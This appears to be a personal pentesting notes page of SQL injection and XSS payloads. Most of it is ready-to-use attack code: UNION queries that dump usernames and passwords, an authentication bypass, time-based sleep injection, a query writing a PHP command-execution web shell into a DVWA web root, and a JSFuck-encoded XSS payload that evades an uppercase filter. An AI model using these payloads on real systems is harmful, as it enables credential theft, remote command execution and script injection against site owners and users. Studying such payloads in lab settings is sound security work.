SQL Injection & XSS Playground
This is my playground for SQL injection and XSS

Classic SQL Injection

Union Select Data Extraction

1
mysql> select * from users where user_id = 1 order by 7;
2
ERROR 1054 (42S22): Unknown column '7' in 'order clause'
3
mysql> select * from users where user_id = 1 order by 6;
4
mysql> select * from users where user_id = 1 union select 1,2,3,4,5,6;
Copied!
1
select * from users where user_id = 1 union all select 1,(select group_concat(user,0x3a,password) from users),3,4,5,6;
Copied!

Authentication Bypass

1
mysql> select * from users where user='admin' and password='blah' or 1 # 5f4dcc3b5aa765d61d8327deb882cf99'
Copied!

Second Order Injection

1
mysql> insert into accounts (username, password, mysignature) values ('admin','mynewpass',(select user())) # 'mynewsignature');
Copied!

Dropping a Backdoor

1
mysql> select * from users where user_id = 1 union select all 1,2,3,4,"<?php system($_REQUEST['c']);?>",6 into outfile "/var/www/dvwa/shell.php" #;
Copied!

Conditional Select

1
mysql> select * from users where user = (select concat((select if(1>0,'adm','b')),"in"));
Copied!

Bypassing Whitespace Filtering

1
mysql> select * from users where user_id = 1/**/union/**/select/**/all/**/1,2,3,4,5,6;
Copied!

Time Based SQL Injection

Sleep Invokation

1
mysql> select * from users where user_id = 1 or (select sleep(1)+1);
Copied!
1
select * from users where user_id = 1 union select 1,2,3,4,5,sleep(1);
Copied!
1
Copied!

XSS

Strtoupper Bypass

Say we have the following PHP code that takes name as a user supplied parameter:
1
<?php
2
$input=$_GET['name'];
3
$sanitized=strtoupper(htmlspecialchars($input));
4
echo '<form action="">';
5
echo "First name: <input type='text' name='name' value='".$sanitized."'><br>";
6
echo "<input type='submit' value='Submit form'></form>";
7
echo "</HTML></body>";
8
?>
Copied!
Line 3 is vulnerable to XSS, and we can break out of the input with a single quote ':
1
$sanitized=strtoupper(htmlspecialchars($input));
Copied!
For example, if we set the name parameter to the value of a', we get:
Note that the a got converted to a capital A and this is due to the strtoupper function being called on our input. What this means is that any ascii letters in our JavaScript payload will get converted to uppercase and become invalid and will not execute (i.ealert() != ALERT()).
To bypass this constraint, we can encode our payload using JsFuck, which eliminates all the letters from the payload and leaves us with this:
1
A' onmouseover='[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()'
Copied!

References

MySQL SQL Injection Cheat Sheet
pentestmonkey
http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
pentestmonkey.net
Hacking website using SQL Injection -step by step guide
Ethical Hacking Tutorials | Learn How to Hack | Hacking Tricks | Penetration Testing Lab
Last modified 3yr ago